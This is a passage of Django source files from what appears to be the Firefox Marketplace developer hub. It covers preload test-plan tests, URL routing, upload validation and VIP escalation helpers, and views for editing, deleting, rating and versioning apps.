        assert 'required' in pq(r.content)('.agree .errorlist').text()

    @mock.patch('mkt.developers.views.save_test_plan')
    @mock.patch('mkt.developers.views.messages')
    def test_submit_multiple_status(self, noop, save_mock):
        # A second submission disables the earlier plan; the page links to
        # the most recent (public) one.
        f = open(self.test_xls, 'r')
        req = req_factory_factory(self.submit_url, user=self.user, post=True,
                                  data={'test_plan': f, 'agree': True})
        preload_submit(req, self.webapp.slug)
        self._submit_pdf()
        eq_(PreloadTestPlan.objects.count(), 2)
        xls = PreloadTestPlan.objects.get(filename__contains='xls')
        pdf = PreloadTestPlan.objects.get(filename__contains='pdf')
        eq_(xls.status, amo.STATUS_DISABLED)
        eq_(pdf.status, amo.STATUS_PUBLIC)
        # Check the link points to most recent one.
        req = req_factory_factory(self.url, user=self.user)
        r = status(req, self.webapp.slug)
        doc = pq(r.content)
        eq_(doc('.test-plan-download').attr('href'),
            pdf.preload_test_plan_url)

    @mock.patch.object(settings, 'PREINSTALL_TEST_PLAN_LATEST',
                       datetime.datetime.now() + datetime.timedelta(days=1))
    @mock.patch('mkt.developers.views.save_test_plan')
    @mock.patch('mkt.developers.views.messages')
    def test_outdated(self, noop, save_mock):
        # A plan submitted before the latest template date is marked
        # outdated on the status page.
        self._submit_pdf()
        req = req_factory_factory(self.url, user=self.user)
        r = status(req, self.webapp.slug)
        doc = pq(r.content)
        assert doc('.outdated')
########NEW FILE########
__FILENAME__ = urls
from django import http
from django.conf.urls import include, patterns, url
from django.core.urlresolvers import reverse
from rest_framework.routers import SimpleRouter
import amo
from amo.decorators import write
from lib.misc.urlconf_decorator import decorate
from mkt.api.base import SubRouter
from mkt.developers.api_payments import (
AddonPaymentAccountViewSet, PaymentAccountViewSet, PaymentCheckViewSet,
PaymentDebugViewSet, UpsellViewSet)
from mkt.developers.decorators import use_apps
from mkt.developers.views import ContentRatingList, ContentRatingsPingback
from mkt.inapp.views import InAppProductViewSet
from mkt.receipts.urls import test_patterns
from . import views
from . import views_payments
def provider_patterns(prefix):
    """Build the payment-provider URL patterns, namespaced under *prefix*.

    Every route name has the form ``mkt.developers.<prefix>.<suffix>``.
    """
    def route_name(suffix):
        # Single place where the namespaced route names are constructed.
        return 'mkt.developers.%s.%s' % (prefix, suffix)

    return patterns(
        '',
        url('^accounts$', views_payments.payment_accounts,
            name=route_name('payment_accounts')),
        url('^accounts/form$', views_payments.payment_accounts_form,
            name=route_name('payment_accounts_form')),
        url('^accounts/add$', views_payments.payments_accounts_add,
            name=route_name('add_payment_account')),
        url('^accounts/(?P<id>\d+)/delete$',
            views_payments.payments_accounts_delete,
            name=route_name('delete_payment_account')),
        url('^accounts/(?P<id>\d+)$',
            views_payments.payments_account,
            name=route_name('payment_account')),
        url('^accounts/(?P<id>\d+)/agreement/$', views_payments.agreement,
            name=route_name('agreement')),
    )
# These will all start with /app/<app_slug>/
app_detail_patterns = patterns('',
    # Redirect people who go to / instead of /edit.
    ('^$', lambda r, app_slug: http.HttpResponseRedirect(
        reverse('mkt.developers.apps.edit', args=[app_slug]))),
    url('^edit$', views.edit, name='mkt.developers.apps.edit'),
    url('^edit_(?P<section>[^/]+)(?:/(?P<editable>[^/]+))?$',
        views.addons_section, name='mkt.developers.apps.section'),
    url('^refresh_manifest$', views.refresh_manifest,
        name='mkt.developers.apps.refresh_manifest'),
    url('^ownership$', views.ownership, name='mkt.developers.apps.owner'),
    url('^enable$', views.enable, name='mkt.developers.apps.enable'),
    url('^delete$', views.delete, name='mkt.developers.apps.delete'),
    url('^disable$', views.disable, name='mkt.developers.apps.disable'),
    url('^publicise$', views.publicise, name='mkt.developers.apps.publicise'),
    url('^status$', views.status, name='mkt.developers.apps.versions'),
    url('^blocklist$', views.blocklist, name='mkt.developers.apps.blocklist'),
    # Only present if DEBUG=True.
    url('^debug/', views.debug, name='mkt.developers.debug'),
    # IARC content ratings.
    url('^content_ratings$', views.content_ratings,
        name='mkt.developers.apps.ratings'),
    url('^content_ratings/edit$', views.content_ratings_edit,
        name='mkt.developers.apps.ratings_edit'),
    url('^status/preload$', views.preload_home,
        name='mkt.developers.apps.preload_home'),
    url('^status/preload/submit$', views.preload_submit,
        name='mkt.developers.apps.preload_submit'),
    # TODO: '^versions/$'
    url('^versions/(?P<version_id>\d+)$', views.version_edit,
        name='mkt.developers.apps.versions.edit'),
    url('^versions/delete$', views.version_delete,
        name='mkt.developers.apps.versions.delete'),
    url('^versions/publicise$', views.version_publicise,
        name='mkt.developers.apps.versions.publicise'),
    url('^payments/$', views_payments.payments,
        name='mkt.developers.apps.payments'),
    url('^payments/disable$', views_payments.disable_payments,
        name='mkt.developers.apps.payments.disable'),
    url('^payments/bango-portal$', views_payments.bango_portal_from_addon,
        name='mkt.developers.apps.payments.bango_portal_from_addon'),
    # in-app payments.
    url('^in-app-config/$', views_payments.in_app_config,
        name='mkt.developers.apps.in_app_config'),
    url('^in-app-products/$', views_payments.in_app_products,
        name='mkt.developers.apps.in_app_products'),
    url('^in-app-secret/$', views_payments.in_app_secret,
        name='mkt.developers.apps.in_app_secret'),
    # Old stuff.
    url('^upload_preview$', views.upload_media, {'upload_type': 'preview'},
        name='mkt.developers.apps.upload_preview'),
    url('^upload_icon$', views.upload_media, {'upload_type': 'icon'},
        name='mkt.developers.apps.upload_icon'),
    url('^upload_image$', views.upload_media, {'upload_type': 'image'},
        name='mkt.developers.apps.upload_image'),
    url('^rmlocale$', views.remove_locale,
        name='mkt.developers.apps.remove-locale'),
    # Not apps-specific (yet).
    url('^file/(?P<file_id>[^/]+)/validation$', views.file_validation,
        name='mkt.developers.apps.file_validation'),
    url('^file/(?P<file_id>[^/]+)/validation.json$',
        views.json_file_validation,
        name='mkt.developers.apps.json_file_validation'),
    url('^upload$', views.upload_for_addon,
        name='mkt.developers.upload_for_addon'),
    url('^upload/(?P<uuid>[^/]+)$', views.upload_detail_for_addon,
        name='mkt.developers.upload_detail_for_addon'),
)

# These will all start with /ajax/app/<app_slug>/
ajax_patterns = patterns('',
    url('^image/status$', views.image_status,
        name='mkt.developers.apps.ajax.image.status'),
)

# Top-level dev-hub URLs.  Every view is wrapped with the @write decorator
# (via `decorate`) so requests are pinned to the master database.
urlpatterns = decorate(write, patterns('',
    # Redirect people who have /apps/ instead of /app/.
    ('^apps/\d+/.*',
     lambda r: http.HttpResponseRedirect(r.path.replace('apps', 'app', 1))),
    # Standalone validator:
    url('^validator/?$', views.validate_addon,
        name='mkt.developers.validate_addon'),
    # Redirect to /addons/ at the base.
    url('^submissions$', use_apps(views.dashboard),
        name='mkt.developers.apps'),
    url('^upload$', views.upload_new, name='mkt.developers.upload'),
    url('^upload/([^/]+)(?:/([^/]+))?$', views.upload_detail,
        name='mkt.developers.upload_detail'),
    url('^standalone-hosted-upload$', views.standalone_hosted_upload,
        name='mkt.developers.standalone_hosted_upload'),
    url('^standalone-packaged-upload$', views.standalone_packaged_upload,
        name='mkt.developers.standalone_packaged_upload'),
    url('^standalone-(hosted|packaged)-upload/([^/]+)$',
        views.standalone_upload_detail,
        name='mkt.developers.standalone_upload_detail'),
    # Standalone tools.
    url('^upload-manifest$', views.upload_manifest,
        name='mkt.developers.upload_manifest'),
    url('^in-app-keys/$', views_payments.in_app_keys,
        name='mkt.developers.apps.in_app_keys'),
    url('^in-app-key-secret/([^/]+)$', views_payments.in_app_key_secret,
        name='mkt.developers.apps.in_app_key_secret'),
    # URLs for a single app.
    url('^app/%s/' % amo.APP_SLUG, include(app_detail_patterns)),
    url('^ajax/app/%s/' % amo.APP_SLUG, include(ajax_patterns)),
    url('^terms$', views.terms, name='mkt.developers.apps.terms'),
    url('^api$', views.api, name='mkt.developers.apps.api'),
    # Developer docs
    url('docs/(?P<doc_name>[-_\w]+)?$',
        views.docs, name='mkt.developers.docs'),
    url('docs/(?P<doc_name>[-_\w]+)/(?P<doc_page>[-_\w]+)',
        views.docs, name='mkt.developers.docs'),
    url('^transactions/', views.transactions,
        name='mkt.developers.transactions'),
    # Bango-specific stuff.
    url('^provider/', include(provider_patterns('provider'))),
    url('^test/$', views.testing, name='mkt.developers.apps.testing'),
    url('^test/receipts/', include(test_patterns)),
))

# DRF routers for the payments API endpoints.
api_payments = SimpleRouter()
api_payments.register(r'account', PaymentAccountViewSet,
                      base_name='payment-account')
api_payments.register(r'upsell', UpsellViewSet, base_name='app-upsell')
api_payments.register(r'app', AddonPaymentAccountViewSet,
                      base_name='app-payment-account')

in_app_products = SimpleRouter()
in_app_products.register(r'in-app', InAppProductViewSet,
                         base_name='in-app-products')

app_payments = SubRouter()
app_payments.register(r'payments/status', PaymentCheckViewSet,
                      base_name='app-payments-status')
app_payments.register(r'payments/debug', PaymentDebugViewSet,
                      base_name='app-payments-debug')

payments_api_patterns = patterns('',
    url(r'^payments/', include(api_payments.urls)),
    url(r'^payments/(?P<app_slug>[^\/]+)/', include(in_app_products.urls)),
    url(r'^apps/app/', include(app_payments.urls)),
)

dev_api_patterns = patterns('',
    url(r'^apps/app/(?P<pk>[^/<>"\']+)/content-ratings/pingback/',
        ContentRatingsPingback.as_view(), name='content-ratings-pingback'),
    url(r'^apps/app/(?P<pk>[^/<>"\']+)/content-ratings/',
        ContentRatingList.as_view(), name='content-ratings-list'),
)
########NEW FILE########
__FILENAME__ = utils
import os
import uuid
from datetime import datetime
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.template.defaultfilters import filesizeformat
import commonware.log
import waffle
from PIL import Image
from tower import ugettext as _
import amo
from amo.helpers import absolutify
from editors.models import EscalationQueue
from lib.video import library as video_library
from mkt.comm.utils import create_comm_note
from mkt.constants import APP_PREVIEW_MINIMUMS
from mkt.constants import comm
from mkt.reviewers.utils import send_mail
log = commonware.log.getLogger('z.devhub')
def uri_to_pk(uri):
    """Return the primary key encoded as the last segment of *uri*.

    A trailing slash, if present, is ignored.
    """
    trimmed = uri.rstrip('/')
    return trimmed.rsplit('/', 1)[-1]
def check_upload(file_obj, upload_type, content_type):
    """Validate an uploaded icon, preview image or video.

    The raw upload is written to a temp location named by a fresh UUID
    plus the (slash-mangled) content type. Returns ``(errors,
    upload_hash)`` where `errors` is a list of localized messages and
    `upload_hash` is the temp file name.

    Raises ValueError if `upload_type` is neither 'icon' nor 'preview'
    and `content_type` is not a known video type.
    """
    errors = []
    upload_hash = ''
    is_icon = upload_type == 'icon'
    is_preview = upload_type == 'preview'
    is_video = content_type in amo.VIDEO_TYPES

    if not any([is_icon, is_preview, is_video]):
        raise ValueError('Unknown upload type.')

    # By pushing the type onto the instance hash, we can easily see what
    # to do with the file later.
    ext = content_type.replace('/', '-')
    upload_hash = '%s.%s' % (uuid.uuid4().hex, ext)
    loc = os.path.join(settings.TMP_PATH, upload_type, upload_hash)

    with storage.open(loc, 'wb') as fd:
        for chunk in file_obj:
            fd.write(chunk)

    # A flag to prevent us from attempting to open the image with PIL.
    do_not_open = False

    if is_video:
        if not video_library:
            errors.append(_('Video support not enabled.'))
        else:
            video = video_library(loc)
            video.get_meta()
            if not video.is_valid():
                errors.extend(video.errors)
    else:
        check = amo.utils.ImageCheck(file_obj)
        if (not check.is_image() or
            content_type not in amo.IMG_TYPES):
            do_not_open = True
            if is_icon:
                errors.append(_('Icons must be either PNG or JPG.'))
            else:
                errors.append(_('Images must be either PNG or JPG.'))

        if check.is_animated():
            do_not_open = True
            if is_icon:
                errors.append(_('Icons cannot be animated.'))
            else:
                errors.append(_('Images cannot be animated.'))

    max_size = (settings.MAX_ICON_UPLOAD_SIZE if is_icon else
                settings.MAX_VIDEO_UPLOAD_SIZE if is_video else
                settings.MAX_IMAGE_UPLOAD_SIZE if is_preview else None)

    if max_size and file_obj.size > max_size:
        do_not_open = True
        # NOTE(review): oversized previews set `do_not_open` but get no
        # error message appended -- confirm that is intentional.
        if is_icon or is_video:
            errors.append(_('Please use files smaller than %s.') %
                          filesizeformat(max_size))

    # Only images that passed the cheap checks get opened with PIL for
    # dimension validation.
    if (is_icon or is_preview) and not is_video and not do_not_open:
        file_obj.seek(0)
        try:
            im = Image.open(file_obj)
            im.verify()
        except IOError:
            if is_icon:
                errors.append(_('Icon could not be opened.'))
            elif is_preview:
                errors.append(_('Preview could not be opened.'))
        else:
            size_x, size_y = im.size
            if is_icon:
                # TODO: This should go away when we allow uploads for
                # individual icon sizes.
                if size_x < 128 or size_y < 128:
                    errors.append(_('Icons must be at least 128px by 128px.'))
                if size_x != size_y:
                    errors.append(_('Icons must be square.'))
            elif is_preview:
                # Accepted in either portrait or landscape orientation.
                if (size_x < APP_PREVIEW_MINIMUMS[0] or
                    size_y < APP_PREVIEW_MINIMUMS[1]) and (
                        size_x < APP_PREVIEW_MINIMUMS[1] or
                        size_y < APP_PREVIEW_MINIMUMS[0]):
                    errors.append(
                        # L10n: {0} and {1} are the height/width of the preview
                        # in px.
                        _('App previews must be at least {0}px by {1}px or '
                          '{1}px by {0}px.').format(*APP_PREVIEW_MINIMUMS))

    return errors, upload_hash
def handle_vip(addon, version, user):
    """Escalate an updated VIP app so senior reviewers are alerted.

    Adds the app to the escalation queue, leaves an escalation note on
    the communication dashboard, logs the action, and -- when the
    'comm-dashboard' waffle switch is off -- emails the senior editors.
    """
    msg = u'VIP app updated'

    # Add to escalation queue
    EscalationQueue.objects.get_or_create(addon=addon)

    # Create comm note
    create_comm_note(addon, version, user, msg, note_type=comm.ESCALATION,
                     perms={'developer': False})

    # Log action
    amo.log(amo.LOG.ESCALATION_VIP_APP, addon, version, created=datetime.now(),
            details={'comments': msg})
    log.info(u'[app:%s] escalated - %s' % (addon.name, msg))

    # Special senior reviewer email.
    if not waffle.switch_is_active('comm-dashboard'):
        context = {'name': addon.name,
                   'review_url': absolutify(reverse('reviewers.apps.review',
                                                    args=[addon.app_slug],
                                                    add_prefix=False)),
                   'SITE_URL': settings.SITE_URL}
        send_mail(u'%s: %s' % (msg, addon.name),
                  'developers/emails/vip_escalation.ltxt', context,
                  [settings.MKT_SENIOR_EDITORS_EMAIL])
########NEW FILE########
__FILENAME__ = views
import json
import os
import sys
import time
import traceback
from collections import defaultdict
from datetime import datetime
from django import forms as django_forms
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.db import transaction
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
import commonware.log
import waffle
from rest_framework import status as http_status
from rest_framework.generics import CreateAPIView, ListAPIView
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from session_csrf import anonymous_csrf, anonymous_csrf_exempt
from tower import ugettext as _, ugettext_lazy as _lazy
from waffle.decorators import waffle_switch
import amo
import amo.utils
import lib.iarc
from access import acl
from addons import forms as addon_forms
from addons.decorators import addon_view
from addons.models import Addon, AddonUser
from addons.views import BaseFilter
from amo import messages
from amo.decorators import (any_permission_required, json_view, login_required,
post_required, skip_cache, write)
from amo.utils import escape_all
from devhub.models import AppLog
from files.models import File, FileUpload
from files.utils import parse_addon
from lib.iarc.utils import get_iarc_app_title
from mkt.api.base import CORSMixin, SlugOrIdMixin
from mkt.api.models import Access, generate
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.developers.decorators import dev_required
from mkt.developers.forms import (APIConsumerForm, AppFormBasic,
AppFormDetails, AppFormMedia, AppFormSupport,
AppFormTechnical, AppVersionForm,
CategoryForm, ContentRatingForm,
IARCGetAppInfoForm, NewPackagedAppForm,
PreloadTestPlanForm, PreviewFormSet,
TransactionFilterForm, trap_duplicate)
from mkt.developers.models import PreloadTestPlan
from mkt.developers.serializers import ContentRatingSerializer
from mkt.developers.tasks import run_validator, save_test_plan
from mkt.developers.utils import check_upload, handle_vip
from mkt.submit.forms import AppFeaturesForm, NewWebappVersionForm
from mkt.webapps.models import ContentRating, IARCInfo, Webapp
from mkt.webapps.tasks import _update_manifest, update_manifests
from mkt.webpay.webpay_jwt import get_product_jwt, WebAppProduct
from stats.models import Contribution
from users.models import UserProfile
from users.views import _login
from versions.models import Version
from . import forms, tasks
# Module-level logger for the devhub views.
log = commonware.log.getLogger('z.devhub')

# We use a session cookie to make sure people see the dev agreement.
DEV_AGREEMENT_COOKIE = 'yes-I-read-the-dev-agreement'
class AddonFilter(BaseFilter):
    """Sort options for the (non-webapp) add-on dashboard listing."""
    opts = (('name', _lazy(u'Name')),
            ('updated', _lazy(u'Updated')),
            ('created', _lazy(u'Created')),
            ('popular', _lazy(u'Downloads')),
            ('rating', _lazy(u'Rating')))
class AppFilter(BaseFilter):
    """Sort options for the webapp dashboard listing."""
    opts = (('name', _lazy(u'Name')),
            ('created', _lazy(u'Created')))
def addon_listing(request, default='name', webapp=False):
    """Set up the queryset and filtering for addon listing for Dashboard.

    Returns a ``(queryset, filter)`` pair where the filter is an
    AppFilter/AddonFilter bound to the request's 'sort' parameter.
    """
    Filter = AppFilter if webapp else AddonFilter
    addons = UserProfile.objects.get(pk=request.user.id).addons
    if webapp:
        qs = Webapp.objects.filter(id__in=addons.filter(type=amo.ADDON_WEBAPP))
        model = Webapp
    else:
        qs = addons.exclude(type=amo.ADDON_WEBAPP)
        model = Addon
    # Renamed local: `filter` shadowed the builtin of the same name.
    sort_filter = Filter(request, qs, 'sort', default, model=model)
    return sort_filter.qs, sort_filter
@anonymous_csrf
def login(request, template=None):
    # NOTE(review): the `template` argument is ignored; the devhub login
    # template is always used -- confirm that is intentional.
    return _login(request, template='developers/login.html')
def home(request):
    """Devhub root: delegates to the (login-protected) index view."""
    return index(request)
@login_required
def index(request):
    """Devhub landing page: send developers to their apps dashboard."""
    # This is a temporary redirect.
    return redirect('mkt.developers.apps')
@login_required
def dashboard(request, webapp=False):
    """Paginated, sortable listing of the current user's apps/add-ons."""
    addons, filter = addon_listing(request, webapp=webapp)
    addons = amo.utils.paginate(request, addons, per_page=10)
    data = dict(addons=addons, sorting=filter.field, filter=filter,
                sort_opts=filter.opts, webapp=webapp)
    return render(request, 'developers/apps/dashboard.html', data)
@dev_required(webapp=True, staff=True)
def edit(request, addon_id, addon, webapp=False):
    """'Edit listing' landing page for a single app."""
    data = {
        'page': 'edit',
        'addon': addon,
        'webapp': webapp,
        'valid_slug': addon.app_slug,
        'tags': addon.tags.not_blacklisted().values_list('tag_text',
                                                         flat=True),
        'previews': addon.get_previews(),
        'version': addon.current_version or addon.latest_version
    }
    # Hosted apps surface their feature profile here; packaged apps
    # manage features per-version on the version edit page.
    if not addon.is_packaged and data['version']:
        data['feature_list'] = [unicode(f) for f in
                                data['version'].features.to_list()]
    if acl.action_allowed(request, 'Apps', 'Configure'):
        data['admin_settings_form'] = forms.AdminSettingsForm(instance=addon,
                                                              request=request)
    return render(request, 'developers/apps/edit.html', data)
@dev_required(owner_for_post=True, webapp=True)
@post_required
def delete(request, addon_id, addon, webapp=False):
    """Delete an app from the devhub (owners only, POST only)."""
    # Database deletes only allowed for free or incomplete addons.
    if not addon.can_be_deleted():
        msg = _('Paid apps cannot be deleted. Disable this app instead.')
        messages.error(request, msg)
        return redirect(addon.get_dev_url('versions'))

    # TODO: Force the user to re-auth with BrowserID (this DeleteForm doesn't
    # ask the user for his password)
    form = forms.DeleteForm(request)
    if form.is_valid():
        reason = form.cleaned_data.get('reason', '')
        addon.delete(msg='Removed via devhub', reason=reason)
        messages.success(request, _('App deleted.'))
        # Preserve query-string parameters if we were directed from Dashboard.
        return redirect(request.GET.get('to') or
                        reverse('mkt.developers.apps'))
    else:
        msg = _('Password was incorrect. App was not deleted.')
        messages.error(request, msg)
        return redirect(addon.get_dev_url('versions'))
@dev_required
@post_required
def enable(request, addon_id, addon):
    """Re-enable an app the developer had disabled themselves."""
    addon.update(disabled_by_user=False)
    amo.log(amo.LOG.USER_ENABLE, addon)
    return redirect(addon.get_dev_url('versions'))
@dev_required
@post_required
def disable(request, addon_id, addon):
    """Let a developer disable their own app (hides it from the store)."""
    addon.update(disabled_by_user=True)
    amo.log(amo.LOG.USER_DISABLE, addon)
    return redirect(addon.get_dev_url('versions'))
@dev_required
@post_required
def publicise(request, addon_id, addon):
    """Flip an app (and its waiting files) from 'public waiting' to public."""
    if addon.status == amo.STATUS_PUBLIC_WAITING:
        addon.update(status=amo.STATUS_PUBLIC)
        File.objects.filter(
            version__addon=addon, status=amo.STATUS_PUBLIC_WAITING).update(
                status=amo.STATUS_PUBLIC)
        amo.log(amo.LOG.CHANGE_STATUS, addon.get_status_display(), addon)
        # Call update_version, so various other bits of data update.
        addon.update_version()
        # Call to update names and locales if changed.
        addon.update_name_from_package_manifest()
        addon.update_supported_locales()

        if waffle.switch_is_active('iarc'):
            addon.set_iarc_storefront_data()

    return redirect(addon.get_dev_url('versions'))
@dev_required(webapp=True)
def status(request, addon_id, addon, webapp=False):
    """Versions/status page: resubmit a rejected app or upload a version.

    Handles two POST actions ('resubmit-app' and 'upload-version') and
    builds the status template context (rejection reason, version
    strings for the delete modal, preload test-plan state).
    """
    form = forms.AppAppealForm(request.POST, product=addon)
    upload_form = NewWebappVersionForm(request.POST or None, is_packaged=True,
                                       addon=addon, request=request)

    if request.method == 'POST':
        if 'resubmit-app' in request.POST and form.is_valid():
            if waffle.switch_is_active('iarc') and not addon.is_rated():
                # Cannot resubmit without content ratings.
                return http.HttpResponseForbidden(
                    'This app must obtain content ratings before being '
                    'resubmitted.')

            form.save()
            create_comm_note(addon, addon.latest_version,
                             request.amo_user, form.data['notes'],
                             note_type=comm.RESUBMISSION)
            if addon.vip_app:
                handle_vip(addon, addon.current_version, request.amo_user)

            messages.success(request, _('App successfully resubmitted.'))
            return redirect(addon.get_dev_url('versions'))

        elif 'upload-version' in request.POST and upload_form.is_valid():
            mobile_only = (addon.latest_version and
                           addon.latest_version.features.has_qhd)

            ver = Version.from_upload(upload_form.cleaned_data['upload'],
                                      addon, [amo.PLATFORM_ALL])

            # Update addon status now that the new version was saved.
            addon.update_status()

            res = run_validator(ver.all_files[0].file_path)
            validation_result = json.loads(res)

            # Set all detected features as True and save them.
            keys = ['has_%s' % feature.lower()
                    for feature in validation_result['feature_profile']]
            data = defaultdict.fromkeys(keys, True)

            # Set "Smartphone-Sized Displays" if it's a mobile-only app.
            qhd_devices = (set((amo.DEVICE_GAIA,)),
                           set((amo.DEVICE_MOBILE,)),
                           set((amo.DEVICE_GAIA, amo.DEVICE_MOBILE,)))
            if set(addon.device_types) in qhd_devices or mobile_only:
                data['has_qhd'] = True

            # Update feature profile for this version.
            ver.features.update(**data)

            messages.success(request, _('New version successfully added.'))
            log.info('[Webapp:%s] New version created id=%s from upload: %s'
                     % (addon, ver.pk, upload_form.cleaned_data['upload']))

            if addon.vip_app:
                handle_vip(addon, ver, request.amo_user)

            return redirect(addon.get_dev_url('versions.edit', args=[ver.pk]))

    ctx = {'addon': addon, 'webapp': webapp, 'form': form,
           'upload_form': upload_form}

    # Used in the delete version modal.
    if addon.is_packaged:
        versions = addon.versions.values('id', 'version')
        version_strings = dict((v['id'], v) for v in versions)
        version_strings['num'] = len(versions)
        ctx['version_strings'] = json.dumps(version_strings)

    if addon.status == amo.STATUS_REJECTED:
        try:
            entry = (AppLog.objects
                     .filter(addon=addon,
                             activity_log__action=amo.LOG.REJECT_VERSION.id)
                     .order_by('-created'))[0]
        except IndexError:
            entry = None
        # This contains the rejection reason and timestamp.
        ctx['rejection'] = entry and entry.activity_log

    if waffle.switch_is_active('preload-apps'):
        test_plan = PreloadTestPlan.objects.filter(
            addon=addon, status=amo.STATUS_PUBLIC)
        if test_plan.exists():
            test_plan = test_plan[0]
            # Nudge the developer to re-submit when the plan predates the
            # latest test-plan template.
            if (test_plan.last_submission <
                settings.PREINSTALL_TEST_PLAN_LATEST):
                ctx['outdated_test_plan'] = True
            ctx['next_step_suffix'] = 'submit'
        else:
            ctx['next_step_suffix'] = 'home'
        ctx['test_plan'] = test_plan

    return render(request, 'developers/apps/status.html', ctx)
def _submission_msgs():
    """Localized success messages shared by the submission/ratings flows."""
    return {
        'complete': _('Congratulations, your app submission is now complete '
                      'and will be reviewed shortly!'),
        'content_ratings_saved': _('Content ratings successfully saved.'),
    }
def _ratings_success_msg(app, old_status, old_modified):
    """
    Ratings can be created via IARC pinging our API.
    Thus we can't display a success message via the standard POST/req/res.
    To workaround, we stored app's rating's `modified` from edit page.
    When hitting back to the ratings summary page, calc what msg to show.

    old_status -- app status during ratings edit page.
    old_modified -- rating modified datetime (ISO string) during ratings
                    edit page, or None.

    Returns the message to flash, or None (implicitly) if nothing changed.
    """
    if old_modified:
        old_modified = datetime.strptime(
            old_modified, '%Y-%m-%dT%H:%M:%S')

    if old_status != app.status:
        # App just created a rating to go pending, show 'app now pending'.
        return _submission_msgs()['complete']

    elif old_modified != app.last_rated_time():
        # App create/update rating, but was already pending/public, show 'ok'.
        return _submission_msgs()['content_ratings_saved']
@waffle_switch('iarc')
@dev_required
def content_ratings(request, addon_id, addon):
    """Summary page for an app's IARC content ratings.

    Pops the state stashed by `content_ratings_edit` out of the session
    to decide whether a success message should be flashed.
    """
    if not addon.is_rated():
        return redirect(addon.get_dev_url('ratings_edit'))

    # Use _ratings_success_msg to display success message.
    session = request.session
    app_id = str(addon.id)
    if 'ratings_edit' in session and app_id in session['ratings_edit']:
        prev_state = session['ratings_edit'][app_id]
        msg = _ratings_success_msg(
            addon, prev_state['app_status'], prev_state['rating_modified'])
        # Was a conditional expression used purely for its side effect;
        # a plain `if` states the intent.
        if msg:
            messages.success(request, msg)
        del session['ratings_edit'][app_id]  # Clear msg so not shown again.
        request.session.modified = True

    return render(request, 'developers/apps/ratings/ratings_summary.html',
                  {'addon': addon})
@waffle_switch('iarc')
@dev_required
def content_ratings_edit(request, addon_id, addon):
    """Form to fetch/refresh an app's IARC rating by submission id/code.

    Also stashes the current rating state in the session so
    `content_ratings` can later pick the right success message.
    """
    initial = {}
    try:
        app_info = addon.iarc_info
        initial['submission_id'] = app_info.submission_id
        initial['security_code'] = app_info.security_code
    except IARCInfo.DoesNotExist:
        pass

    form = IARCGetAppInfoForm(data=request.POST or None, initial=initial,
                              app=addon)

    if request.method == 'POST' and form.is_valid():
        try:
            form.save()
            return redirect(addon.get_dev_url('ratings'))
        except django_forms.ValidationError:
            pass  # Fall through to show the form error.

    # Save some information for _ratings_success_msg.
    # (Idiom fix: `x not in y` instead of `not x in y`.)
    if 'ratings_edit' not in request.session:
        request.session['ratings_edit'] = {}
    last_rated = addon.last_rated_time()
    request.session['ratings_edit'][str(addon.id)] = {
        'app_status': addon.status,
        'rating_modified': last_rated.isoformat() if last_rated else None
    }
    request.session.modified = True

    return render(request, 'developers/apps/ratings/ratings_edit.html',
                  {'addon': addon,
                   'app_name': get_iarc_app_title(addon),
                   'form': form,
                   'company': addon.latest_version.developer_name,
                   'now': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
@waffle_switch('preload-apps')
@dev_required
def preload_home(request, addon_id, addon):
    """
    Gives information on the preload process, links to test plan template.

    Gated on the 'preload-apps' waffle switch.
    """
    return render(request, 'developers/apps/preload/home.html',
                  {'addon': addon})
@waffle_switch('preload-apps')
@dev_required(owner_for_post=True, webapp=True)
def preload_submit(request, addon_id, addon, webapp):
    """Accept a preload test plan (PDF/XLS), disabling prior submissions."""
    if request.method == 'POST':
        form = PreloadTestPlanForm(request.POST, request.FILES)
        if form.is_valid():
            # Save test plan file.
            test_plan = request.FILES['test_plan']

            # Figure the type to save it as (cleaned as pdf/xls from the form).
            if test_plan.content_type == 'application/pdf':
                filename = 'test_plan_%s.pdf'
            else:
                filename = 'test_plan_%s.xls'
            # Timestamp.
            filename = filename % str(time.time()).split('.')[0]
            save_test_plan(request.FILES['test_plan'], filename, addon)

            # Log test plan.
            PreloadTestPlan.objects.filter(addon=addon).update(
                status=amo.STATUS_DISABLED
            )
            PreloadTestPlan.objects.create(addon=addon, filename=filename)

            messages.success(
                request,
                _('Application for preload successfully submitted.'))
            return redirect(addon.get_dev_url('versions'))
        else:
            messages.error(request, _('There was an error with the form.'))
    else:
        form = PreloadTestPlanForm()

    return render(request, 'developers/apps/preload/submit.html',
                  {'addon': addon, 'form': form})
@dev_required
def version_edit(request, addon_id, addon, version_id):
    """Edit one version: release notes, plus features for packaged apps."""
    show_features = addon.is_packaged
    formdata = request.POST if request.method == 'POST' else None
    version = get_object_or_404(Version, pk=version_id, addon=addon)
    version.addon = addon  # Avoid extra useless query.

    form = AppVersionForm(formdata, instance=version)
    all_forms = [form]

    if show_features:
        appfeatures = version.features
        appfeatures_form = AppFeaturesForm(request.POST or None,
                                           instance=appfeatures)
        all_forms.append(appfeatures_form)

    if request.method == 'POST' and all(f.is_valid() for f in all_forms):
        # Save with a plain loop: the old list comprehension was used
        # only for its side effects and the code below relied on its
        # leaked loop variable (`f`), which is fragile. All bound forms
        # share request.POST as `.data`, so using `form.data` here is
        # behavior-preserving.
        for bound_form in all_forms:
            bound_form.save()

        if form.data.get('approvalnotes'):
            create_comm_note(addon, addon.current_version,
                             request.amo_user, form.data['approvalnotes'],
                             note_type=comm.REVIEWER_COMMENT)

        messages.success(request, _('Version successfully edited.'))
        return redirect(addon.get_dev_url('versions'))

    context = {
        'addon': addon,
        'version': version,
        'form': form
    }

    if show_features:
        context.update({
            'appfeatures_form': appfeatures_form,
            'appfeatures': appfeatures,
            'feature_list': [unicode(f) for f in appfeatures.to_list()]
        })

    return render(request, 'developers/apps/version_edit.html', context)
@dev_required
@post_required
def version_publicise(request, addon_id, addon):
    """Make a single approved-but-waiting version (and its files) public."""
    version_id = request.POST.get('version_id')
    version = get_object_or_404(Version, pk=version_id, addon=addon)

    if version.all_files[0].status == amo.STATUS_PUBLIC_WAITING:
        File.objects.filter(version=version).update(status=amo.STATUS_PUBLIC)
